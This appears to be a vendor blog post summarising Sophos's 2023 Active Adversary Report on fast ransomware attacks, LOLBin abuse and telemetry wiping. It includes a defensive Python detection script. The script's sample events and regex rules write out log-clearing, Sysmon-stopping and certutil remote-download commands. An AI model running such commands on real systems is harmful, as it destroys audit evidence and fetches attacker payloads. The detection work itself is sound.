Cybersecurity is a never-ending battle. Adversaries continually rush the firewall, probing multiple points at once and looking for the weak spot that gets them into the system. But if defenders know what an attack looks like, they can quickly muster their defenses, contain the breach, and stop the attack cold.
Sophos is on to this and just published the 2023 Active Adversary Report for Security Practitioners. The report outlines what Sophos X-Ops’ Incident Response (IR) team has learned about the current adversary landscape. It offers actionable intelligence on how security practitioners should shape their defensive strategy to stay one step ahead of the attackers.
Adversaries Act Fast
As the Sophos report noted, attack speeds change; attack directions and processes don’t. The median dwell time for a ransomware attack is down to five days or less. These “fast” attacks suggest that ransomware attackers are more practiced, and that they know detection has improved and are moving faster to stay ahead of it.
Tactics, techniques, and procedures (TTPs) are the same for attacks above and below the five-day dwell time mark. Most attackers use common and useful “living-off-the-land” binaries (LOLBins) and other legitimate tools and behaviors to execute multi-stage attacks without being noticed.
Fight Speed with Friction
Cyber defenders need to turn the attacker’s behavior against them. Attackers rely on speed to penetrate an IT system, so increase friction wherever possible to slow them down. In this case, friction means layered defenses built on robust protection and constant monitoring. If you make the attackers’ job harder, you stretch out each stage of the attack and buy valuable time to respond.
Defense in depth works when coupled with complete telemetry. When telemetry is missing, it only adds time to remediation, time that most organizations can’t afford. The report found that telemetry logs were missing in nearly 42% of the attack cases studied. In 82% of those cases, cybercriminals had disabled or wiped the telemetry to hide their tracks. This is why complete and accurate logging is essential when responding to an active threat.
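The two behaviors above, LOLBin abuse and telemetry wiping, both leave traces in process-creation logs before the logs themselves disappear, which is exactly why those events should be forwarded off-host the moment they occur. The following Python script is an added illustration, not code from the Sophos report or a Sophos product: it runs a small set of detection rules over a handful of constructed process-creation events (the hostnames, users, command lines and the 203.0.113.5 address are all made up for the demo) and flags hosts where several evidence-destruction commands cluster in a short window.

```python
"""Flag telemetry tampering and LOLBin abuse in process-creation events.

Added illustration, not code from the Sophos report. The event fields,
rule names and sample events are assumptions chosen for this demo.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real incident data). A real feed would
# come from Sysmon event 1, Windows 4688 or an EDR, shipped off-host.
SAMPLE_EVENTS = [
    {"ts": "2023-10-02T03:14:07Z", "host": "fs01", "user": "CORP\\svc_backup",
     "cmdline": "wevtutil.exe cl Security"},
    {"ts": "2023-10-02T03:14:09Z", "host": "fs01", "user": "CORP\\svc_backup",
     "cmdline": "powershell.exe -nop -w hidden -c \"Clear-EventLog -LogName Application\""},
    {"ts": "2023-10-02T03:15:22Z", "host": "fs01", "user": "CORP\\svc_backup",
     "cmdline": "sc.exe stop Sysmon64"},
    {"ts": "2023-10-02T03:20:41Z", "host": "ws17", "user": "CORP\\jdoe",
     "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.5/a.txt C:\\Users\\Public\\a.txt"},
    {"ts": "2023-10-02T09:01:00Z", "host": "ws17", "user": "CORP\\jdoe",
     "cmdline": "notepad.exe report.txt"},
    {"ts": "2023-10-02T09:05:00Z", "host": "dc01", "user": "CORP\\admin",
     "cmdline": "wevtutil.exe qe Security /c:5"},   # benign: querying, not clearing
]

# Each rule: (name, category, regex over the command line). These cover
# well-known native-binary abuses and are illustrative, not exhaustive.
RULES = [
    ("wevtutil_clear_log",  "telemetry_tamper", re.compile(r"\bwevtutil(\.exe)?\s+(cl|clear-log)\b", re.I)),
    ("ps_clear_eventlog",   "telemetry_tamper", re.compile(r"\bClear-EventLog\b", re.I)),
    ("auditpol_clear",      "telemetry_tamper", re.compile(r"\bauditpol(\.exe)?\s+/clear\b", re.I)),
    ("usn_journal_delete",  "telemetry_tamper", re.compile(r"\bfsutil(\.exe)?\s+usn\s+deletejournal\b", re.I)),
    ("stop_sysmon_service", "telemetry_tamper", re.compile(r"\b(sc|net)(\.exe)?\s+stop\s+sysmon", re.I)),
    ("certutil_download",   "lolbin",           re.compile(r"\bcertutil(\.exe)?\b.*-urlcache\b", re.I)),
    ("mshta_remote",        "lolbin",           re.compile(r"\bmshta(\.exe)?\s+\S*https?://", re.I)),
    ("regsvr32_scrobj",     "lolbin",           re.compile(r"\bregsvr32(\.exe)?\b.*/i:https?://.*scrobj\.dll", re.I)),
]


def match_event(event):
    """Return the (rule_name, category) pairs that fire on one event."""
    cmd = event.get("cmdline", "")
    return [(name, cat) for name, cat, rx in RULES if rx.search(cmd)]


def evaluate(events):
    """Run every rule over every event and return the findings in event order."""
    findings = []
    for ev in events:
        for name, cat in match_event(ev):
            findings.append({"ts": ev["ts"], "host": ev["host"], "user": ev["user"],
                             "rule": name, "category": cat, "cmdline": ev["cmdline"]})
    return findings


def _parse_ts(ts):
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")


def summarize(findings, window=timedelta(minutes=10)):
    """Per-host counts by category. A host with two or more tamper hits
    inside `window` is marked as an evidence-destruction cluster: the
    attacker is actively removing the telemetry you will need later."""
    per_host = defaultdict(lambda: {"telemetry_tamper": 0, "lolbin": 0, "cluster": False})
    tamper_times = defaultdict(list)
    for f in findings:
        per_host[f["host"]][f["category"]] += 1
        if f["category"] == "telemetry_tamper":
            tamper_times[f["host"]].append(_parse_ts(f["ts"]))
    for host, times in tamper_times.items():
        times.sort()
        if any(times[i] - times[i - 1] <= window for i in range(1, len(times))):
            per_host[host]["cluster"] = True
    return dict(per_host)


if __name__ == "__main__":
    hits = evaluate(SAMPLE_EVENTS)
    for f in hits:
        print(f"{f['ts']} {f['host']:<5} {f['category']:<16} {f['rule']:<20} {f['cmdline']}")
    for host, s in summarize(hits).items():
        flag = "  <-- evidence-destruction cluster, triage now" if s["cluster"] else ""
        print(f"{host}: tamper={s['telemetry_tamper']} lolbin={s['lolbin']}{flag}")
```

The point of the cluster check is that a single `wevtutil cl` may be an administrator tidying up, but three log-destroying commands from a service account inside two minutes is the signature of an intruder covering tracks, and the only reason the rule can still fire is that the events were shipped off the host before the local log was cleared.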
Enterprises should also have a response plan for the attacks most likely to affect their business and rehearse it with their IT department and other stakeholders. Rehearsing the plan helps identify and address system weaknesses before attackers do.
The most important strategic advantage one can cultivate for cyber defense is information sharing. It is good practice to build circles of cybersecurity specialists so that they can share their findings and learn from their successes and failures.
Staying One Step Ahead
Don’t assume attackers have an advantage because they are working faster. There is no tangible difference between fast and slow attacks besides speed, and a speedy attack can be loud and sloppy.
Sophos can help your customers pick up those signals and do what they have always done: spot the breach, contain the attack, and eliminate the threat.
Read the 2023 Active Adversary Report for Security Practitioners to learn more about attacker behaviors, tools, and techniques.